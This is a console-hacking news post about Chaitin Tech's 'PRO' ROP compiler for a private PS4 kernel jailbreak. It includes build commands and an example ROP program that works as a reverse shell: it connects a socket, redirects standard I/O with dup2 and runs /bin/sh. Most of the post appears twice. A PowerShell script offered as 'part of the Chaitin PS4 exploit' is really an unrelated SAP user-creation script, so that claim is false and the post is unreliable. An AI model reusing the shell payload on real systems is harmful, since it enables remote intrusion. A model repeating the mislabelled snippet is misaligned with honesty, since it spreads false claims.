Following recent research from PlayStation 4 developers into the 4.01 PS4 Jailbreak by Chaitin Tech, today the Chinese PS4 Jailbreaking Team have released an ROP (Return Oriented Programming) tool on their Pro GIT to aid developers in exploiting the PlayStation 4.
Download: pro-master.zip / GIT
PSXHAX Moderator @Centrino points out the GIT work is incomplete, referencing line 41 meaning it only contains partial information and nothing can be done with it by end-users just yet.
In other words, although Chaitin Tech are not teasing, they also are not spoon feeding (giving away their full exploit).
Here is a snippet from #ps4dev on iRC via @Fimo for those interested:
[rck`d] the nonsecure browser has no jit, only the secure browser now (used for PSN store, etc) has JIT
[rck`d] Since some version, the internal browser is compiled WITHOUT jit support, and sys_jitshm_xxx seems to be disabled for unprivileged process
Everyone can draw their own conclusions, but thus far it wouldn't surprise me if the Chinese Team is just a 'smoke and mirrors' scheme as dongle douchbags start re-DRMing the exploit to profit off PS4 sceners... then when people whine they'll direct them to this GIT of incomplete code as a 'free' alternative to their useless 'product' but hopefully I'm mistaken.
Anyhow, to quote from the README.md: PRO: PROgramming ROP like a PRO
This is a crappy tool used in our private PS4 jailbreak. Since some version, the internal browser is compiled WITHOUT jit support, and sys_jitshm_xxx seems to be disabled for unprivileged process. We have to write the kernel exploitation in ROP, like what has been done in HENKaku jailbreak.
Build
If you have modified the pro.g4 file, use the following commands to generate new lexer and parser.
Examples
Usage
A BIG TODO. Just try and learn by yourself.
Quick Guide
All expressions should be evaluated during compilation, Const/Func should be initialized in declaration.
Func is initialized with . Base/Offset is used for relocation, Signature determines the calling convention of Func.
Array can be declared with size(Int) or directly initialized with its content(String).
For loop should be written in template script, it will be rendered before compilation. For more information, check Jinja2.
From Pastebin.com on what may be part of the Chaitin PS4 exploit used:
Thanks to @spyro2670 in the Shoutbox and @simobuoncuo for the tip!
Download: pro-master.zip / GIT
PSXHAX Moderator @Centrino points out the GIT work is incomplete, referencing line 41 meaning it only contains partial information and nothing can be done with it by end-users just yet.
In other words, although Chaitin Tech are not teasing, they also are not spoon feeding (giving away their full exploit).
Here is a snippet from #ps4dev on iRC via @Fimo for those interested:
[rck`d] the nonsecure browser has no jit, only the secure browser now (used for PSN store, etc) has JIT
[rck`d] Since some version, the internal browser is compiled WITHOUT jit support, and sys_jitshm_xxx seems to be disabled for unprivileged process
Everyone can draw their own conclusions, but thus far it wouldn't surprise me if the Chinese Team is just a 'smoke and mirrors' scheme as dongle douchbags start re-DRMing the exploit to profit off PS4 sceners... then when people whine they'll direct them to this GIT of incomplete code as a 'free' alternative to their useless 'product' but hopefully I'm mistaken. Anyhow, to quote from the README.md: PRO: PROgramming ROP like a PRO
This is a crappy tool used in our private PS4 jailbreak. Since some version, the internal browser is compiled WITHOUT jit support, and sys_jitshm_xxx seems to be disabled for unprivileged process. We have to write the kernel exploitation in ROP, like what has been done in HENKaku jailbreak.
Build
Code:
pip install git+https://github.com/chaitin/pro
Code:
cd pro/parse && antlr4 -no-listener -visitor -Dlanguage=Python2 pro.g4
Code:
toy {
{% include "gadgets.pro" %}
{% include "glibc.pro" %}
const AF_INET(2);
const SOCK_STREAM(1);
const IPPROTO_IP(0);
var fd;
socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
func store_rdx_rax<libc, 0x0002e60c, "rdx,rax::">;
store_rdx_rax(&fd, undefined);
printf("socket fd = %d\n", fd);
array addr["\x02\x00\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"];
connect(fd, addr, 0x10);
{% for i in range(3): %}
dup2(fd, {{i}});
{% endfor %}
system("/bin/sh");
exit(1);
}A BIG TODO. Just try and learn by yourself.
Quick Guide
All expressions should be evaluated during compilation, Const/Func should be initialized in declaration.
Func is initialized with . Base/Offset is used for relocation, Signature determines the calling convention of Func.
Array can be declared with size(Int) or directly initialized with its content(String).
For loop should be written in template script, it will be rendered before compilation. For more information, check Jinja2.
From Pastebin.com on what may be part of the Chaitin PS4 exploit used:
Code:
# スクリプト実行パスを取得する関数
# バージョンによって取得する情報を変更する
function Get-ScriptDir() {
if( $PSVersionTable.PSVersion.Major -ge 3) {
# Data from $PSScriptRoot
$ScriptDir = $PSScriptRoot
}
else {
# Data from $MyInvocation.MyCommand.Path
$ScriptDir = Split-Path $MyInvocation.MyCommand.Path -Parent
}
return $ScriptDir
}
# NetWeaver .Net Connectorのモジュールをロードする関数
function Load-Nco {
$ScriptDir = Get-ScriptDir
$Size = [System.IntPtr]::Size
if ($Size -eq 4) {
$Path = $ScriptDir + "\x86\"
}
elseif ($Size -eq 8) {
$Path = $ScriptDir + "\x64\"
}
[Reflection.Assembly]::LoadFile($Path + "sapnco.dll") > $Null
[Reflection.Assembly]::LoadFile($Path + "sapnco_utils.dll") > $Null
}
# -----
# SAPへの接続先を設定する
# -----
Function Get-Destination {
$cfgParams = New-Object SAP.Middleware.Connector.RfcConfigParameters
$cfgParams.Add("NAME", "TEST")
$cfgParams.Add("ASHOST", "ABAP")
$cfgParams.Add("SYSNR", "00")
$cfgParams.Add("CLIENT", "400")
$cfgParams.Add("USER", "User")
$secPasswd = Read-Host -Prompt "Password" -AsSecureString
$ptrPasswd = [Runtime.InteropServices.Marshal]::SecureStringToBStr($secPasswd)
$passwd = [Runtime.InteropServices.Marshal]::PtrToStringBStr($ptrPasswd)
$cfgParams.Add("PASSWD", $passwd)
$cfgParams.Add
Return [SAP.Middleware.Connector.RfcDestinationManager]::GetDestination($cfgParams)
}
# ----
# SAP汎用モジュールを実行する
# ----
Function Invoke-SAPFunctionModule {
$destination = Get-Destination
# Metadata
Try {
[SAP.Middleware.Connector.IRfcFunction]$bapiCreateUser = $destination.Repository.CreateFunction("BAPI_USER_CREATE1")
[SAP.Middleware.Connector.IRfcFunction]$bapiTransactionCommit = $destination.Repository.CreateFunction("BAPI_TRANSACTION_COMMIT")
}
Catch [SAP.Middleware.Connector.RfcBaseException] {
Write-Host "Failed"
Break
}
# Set Import Parameters
$bapiCreateUser.SetValue("USERNAME", "MYUSER")
[SAP.Middleware.Connector.IRfcStructure]$imPassword = $bapiCreateUser.GetStructure("PASSWORD")
$imPassword.SetValue("BAPIPWD", "initial")
[SAP.Middleware.Connector.IRfcStructure]$imAddress = $bapiCreateUser.GetStructure("ADDRESS")
$imAddress.SetValue("FIRSTNAME", "My")
$imAddress.SetValue("LASTNAME", "User")
$imAddress.SetValue("FULLNAME", "MyUser")
# Open context
[SAP.Middleware.Connector.RfcSessionManager]::BeginContext($destination) > $Null
# 汎用モジュール呼び出し
Try {
# ユーザ作成
$bapiCreateUser.Invoke($destination)
[SAP.Middleware.Connector.IRfcTable]$return = $bapiCreateUser.GetTable("RETURN")
ForEach ($line in $return) {
Write-Host $line.GetValue("TYPE") "-" $line.GetValue("MESSAGE")
}
# コミット
$bapiTransactionCommit.Invoke($destination)
}
Finally {
# クローズ
[SAP.Middleware.Connector.RfcSessionManager]::EndContext($destination) > $Null
}
}
# ----
# メイン関数
# ----
Function Main() {
Load-NCo
Invoke-SAPFunctionModule
}
# ------------------------------
# Main
# ------------------------------
Main
